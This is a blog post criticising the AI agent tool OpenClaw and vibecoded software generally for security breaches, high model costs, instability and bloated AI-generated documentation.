Vanilla.sh | OpenClaw - Smoke And Mirrors For The Masses

Introduction

I have a bigger article on AI and vibecoding coming up, but I felt the need to quickly snapshot my thoughts on the current flavor of the month Twitter hype product: OpenClaw (formerly MoltBot (formerly ClawdBot)).

OpenClaw brands itself as “the AI that actually does things”. What it really is, is basically a vibecoded AI CLI wrapper that is occasionally triggered automatically. During these automatic triggers, called “heartbeats”, the AI can access its “memory” (basically, markdown-formatted text files) and act on tasks you gave it during your last active conversation. That is more or less the whole magic. A ChatGPT wrapper, but with a crontab this time.

Unlike most vibecoded projects, the creator, Peter Steinberger, is a well-known developer whose history precedes the concept of “vibecoding”, and the articles on his blog about his workflow are actually quite interesting to read. He doesn’t seem as obsessed with armies (or “swarms”, as we now apparently call them) of sub-agents, and seems to recognize the need for some form of validation of AI-generated code. This is what ultimately made me give OpenClaw a chance. However, my thoughts on the project aren’t quite so positive.

It’s A Cool Idea, But…

Let’s get something out of the way first. In my opinion, OpenClaw is undeniably a cool idea. I have dozens, if not hundreds of ideas for small automations and optimizations in my life that a sufficiently smart AI should be able to procure given unsupervised root access to an entire cloud system. My proof of concept for this sentiment is currently none other than Claude Code. I’m using it to write small, non-critical automations that I wouldn’t have bothered to write myself otherwise.

For the sake of an example, here are a few automations that I’d love to have an AI take care of for me in the near future:

Monitor stocks I hold, cross-check with news and proactively inform me of current events that might affect the value.
Consolidate and summarize world- and tech-news from different sites into a configurable morning digest based on my preferences.
Send me reminders on Discord at opportune times about anything I mentioned in passing. I don’t want to manually think about or configure these reminders for specific times, the AI should use context to derive when to notify me with which level of urgency.
Manage IoT and automation scripts for my home appliances in an iterative natural language feedback loop.
Occasionally search for new books I would enjoy based on my previous reviews and tell me about them.

And these examples are only limited by my current privacy conscience and unwillingness to give a language model sovereignty over my personal data. In a world where I didn’t have to run these requests through a cloud LLM, and could verify its output, I’d add stuff like:

Give me periodic summaries of new e-mails, assign labels for me to review (i.e. likely to be important, likely to be spam, interesting vs. uninteresting newsletters)
Monitor and backread specific Discord channels and inform me when interesting topics come up, or summarize how a conversation topic manifested.
Automatically sort a chore or event into my calendar, based on available timeslots and daily workload.
Proactively review my system and network setup and create write-ups of possible improvements or publicly disclosed vulnerabilities
And about 300 more.

All that is to say that I really do believe in the concept of AI-controlled systems in the future. I think it’s incredibly cool tech and OpenClaw is certainly a very, very, very early glimpse into what could happen one day. However, in its current state…

It’s Unsafe

Vibecoding is pushing the old tech motto “move fast and break things” to the absolute extreme. Software is being created at a previously unimaginable pace, at the snap of a finger of any individual that is, at best, informed and well-intentioned, and at worst, a tech-illiterate grifter. But just as we are pushing the limits of “move fast”, we are also increasingly “breaking things”.

OpenClaw, just a few days ago, patched a serious vulnerability that allowed arbitrary remote code execution, requiring only the visit of an attacker-controlled website with JavaScript enabled and a running OpenClaw instance.

The creator of Moltbook, the viral social media platform for AI agents, loudly exclaimed on Twitter that he “didn’t write one line of code for @moltbook. I just had a vision for the technical architecture and AI made it a reality.” Sounds very utopian, and I commend him for keeping this post up after security researchers, within minutes of inspecting the website, noticed that an admin-level access key to the core database was publicly embedded in the frontend code, leaking emails, full names, and API keys of thousands of users and allowing anyone to manipulate the content and metadata of any post on the platform!

These breaches are very, very serious. And yes, they happen in “handcrafted” software as well. However, a combination of developer awareness and smart library restrictions has generally diminished these risks over the past decade or so quite substantially. In contrast, AI will, in my experience, often take shortcuts to achieve the “minimum valuable prototype” - except the minimum valuable prototype seems to now be a marketable product to hype up millions of potential users on social media while exposing them to vulnerabilities the scope of which hasn’t really been observed on a widespread scale since the early 2000s. It’s like computer security now has its own little antivaxx movement.

It’s Expensive

Let’s ignore all the critical security flaws for a second. OpenClaw is also PROHIBITIVELY expensive. For all of Peter Steinberger’s accolades, he doesn’t seem to be immune to the honestly somewhat psychotic and self-absorbed idea that a foundation model can be aligned if you just give it hundreds of thousands of lines of instructions spread across markdown files with important sounding names like “SOUL.md”. This, combined with no obvious attempt to condense context across long conversations, can lead to nasty surprises, like suddenly realizing you are paying 1$ per single message sent to Claude Opus. As we’ve discussed, the app also triggers periodic “heartbeats”, even when you’re not actively chatting with it - which are just… even more model calls, that can often just lead to the result “nothing to do”.

In about 30 minutes of using Claude Opus through OpenClaw, I’d burned through most of my $6 in free Anthropic credit from last year. “Well”, you might say, “just don’t use Opus”. And, I mean, I guess? It is true that you can significantly cut costs by being smart about your model usage. However, the effectiveness of OpenClaw as a whole dramatically decreases for less advanced base models. I signed up for a one month subscription to Synthetic.new, a very cost-effective service for querying large open source models. Using Synthetic, I tried using GLM 4.7, Kimi K2.5 and DeepSeek V3.2 as base models, with very sobering results. Opus 4.5 does have a little bit of magic to it, but it’s very expensive magic. I don’t personally buy much into the argument that performance differences are not discernible between foundation models. Seems a little bit like the “human eyes can’t see more than 30 FPS” debate to me.

And what exactly is the value proposition if not using Opus? I have a Claude subscription, it costs me $20 a month. With these $20 I can pester Opus a lot. Certainly more than a single 40 turn conversation. I see the vision in using Opus to set up and deploy elaborate task managers, reminder systems, tools and scripts unsupervised. I don’t really see the vision in spending 2 hours trying to rein in a weaker base model to deploy a tool that I could have deployed myself in 30 minutes using Claude Code. It feels like OpenClaw, in this instance, acts mostly as an interface to compensate for someone’s lack of experience in software development, by pseudo-automating deployment and providing a familiar chat interface like Discord or Telegram, as opposed to a CLI.

Supposedly OpenAI is taking a different stance on hijacking the OAuth token from their subscription service than Anthropic, who have been indiscriminately banning users abusing the subscription for wrappers outside of Claude Code. This could mean that in a world where I didn’t have any of my other criticisms, that might be a reasonable avenue for reigning in costs. Again, it’s not like I don’t believe in the vision. It’s just that the current implementation doesn’t manifest that vision at all. Unless you have a significant sum of cash to burn and basically no technical experience, there is just nothing here that can’t be re-implemented by yapping with Claude Code for 15 minutes at a fraction of the cost.

It’s Unstable

Let’s ignore the critical security flaws AND the cost for a second. For me, the value in vibecoded software is that it is manifested out of thin air and custom tailored to solve a specific problem I have, at the cost of extensibility, maintainability and security. This idea goes out the window when you use someone else’s vibecoded software. It’s still just as unmaintainable, still just as unsafe. But now you also have no direct connection to the problem it is trying to solve, and no idea what the premise for generating the software even was (i.e. what ideas, thoughts, or prompts went into creating it).

This new social-media-driven phenomenon of “presenting” vibecoded software as a “product” to potential “customers”, to me, mirrors the same vaporware peddling seen in AI-generated art, music, or text (“I asked ChatGPT to…”). It may well hold value to you as the creator (although more often than not, that value is just the chance to get away with a quick cashgrab), but the value to others is proportional to the effort it took to create it. There is no value in telling me what ChatGPT told you, I can ask it myself. There is no value to your AI generated image, song, or video, I can generate it myself if I wanted to, and in the process customize it to my own preferences. This is true regardless of your stance on AI-generated media. If it’s trivial to do for anyone, there is no value proposition in publishing it for others to consume. Similarly, even if I wanted to use vibecoded software, if the generation process consists of yapping to Claude Code for five minutes, why wouldn’t I just make my own version of the software that I understand and that is built according to my own standards and specifications?

When using OpenClaw, I frequently ran into issues. The bot wouldn’t post in specific Discord channels. It would not respond with a message after tool calls. It would crash entirely at times, and just executing the CLI command openclaw takes more than three full seconds to process (which is insanity, by the way).

The repository for OpenClaw currently has over 1.300 open issues, 375.000 lines of code, 180.000 lines of tests, and more than one hundred thousand lines of documentation in the docs/ folder.

Let me repeat this.

The OpenClaw code repository currently contains more than one hundred thousand lines of text documentation. In fairness, half of it is a full Mandarin version of the docs, for some reason. Still, there are over two hundred thirty thousand words in the English documentation alone. In other words, the documentation of OpenClaw is currently rapidly approaching the combined length of the first three Harry Potter books.

The mere implication that any single human or small team of developers understands this documentation, or has ever even read it, let alone kept it up to date with the currently eight thousand commits is preposterous. In fact, if you want an anecdotal example of how developers typically treat AI generated documentation, a few days ago on HackerNews, someone showed off their project, ironically a container wrapper for OpenClaw (yeah, a container for my CLI wrapper for my API to query my LLM). The AI-generated documentation was so bad that not even the quick-start command was correct. The model falsely hallucinated and documented that the project belonged to Anthropic itself, and made up a plausible sounding project name in the process. In other words, most AI generated “documentation” is just drivel that probably ends up poisoning the model’s context more than anything else. Now imagine that example blown up times 1.000. No wonder it doesn’t work.

So what am I to do when an actual issue with such a product arises in my daily use? Nothing. There is nothing I, as a standalone developer, really can to at that point, other than let loose another rabid AI agent to take a sledgehammer to some code randomly and hope it solves my problem, which is probably what a not insignificant portion of the 1.300 active GitHub issues consist of. Again, we are talking about an LLM wrapper with a crontab and a few social media channel integrations that more or less sometimes work. What are we doing here?

It’s Irresponsible

So maybe, let’s no longer ignore the critical security flaws, the cost, and the general instability of these projects. OpenClaw follows an increasingly long track record of vibecoded software that enables developers to forego longstanding software standards by shirking responsibility onto a statistical text generation model. A famous IBM training manual quote once said:

A computer can never be held accountable Therefore a computer must never make a management decision.

In my opinion, people like Peter Steinberger and Matt Schlicht are directly and solely responsible for compromising thousands of machines and tens of thousands of rows of personal information, and that’s before you even consider novel attack vectors like prompt injection that developers of software based on language models simply must be aware of.

Throwing together a website in an afternoon that compromises your userbase without at least performing a manual security review is not cutesy. It’s not a fun little thing you made. It’s negligent. You cannot shirk responsibility for these predictable outcomes. Not onto your users, and not onto your text model. More and more frequently, I see creators of vibecoded software defending their bad architectural decisions by saying “it’s just a little thing I made, I didn’t mean for it to be good”. To me, that argument goes out the window as soon as you publish your project for anyone to use and proudly market it as “the app I made”. In the past, these shoddily created weekend projects would have terrible UI/UX, scaring tech illiterate users off. They probably wouldn’t even have a frontend to begin with. The sudden addition of colorful websites and grandiose presentations that used to indicate high quality software should not be used to bait unaware users into trusting your project and defer to their “better judgment” when things predictably go awry.

I never considered computer programming to be much of an art form. After recent events, I am beginning to reconsider. I know the prospect of new tech is exciting for developers, and everyone wants to play with the cool new toy. But it’s not cool to sell empty promises to people who don’t know any better. It’s unfortunately so 2026-coded that something like Moltbook is a vibecoded unsafe slop factory that, within one week, is overran by people trying to shill crypto and producing landfills worth of text that nobody has ever nor will ever read, instead of the admittedly cool experiment of having a thousand small, privileged, personalized and sandboxed agents communicate, learn about each other, and carve out their own little virtual domain.

As a software developer by passion, I hope we can be better than this.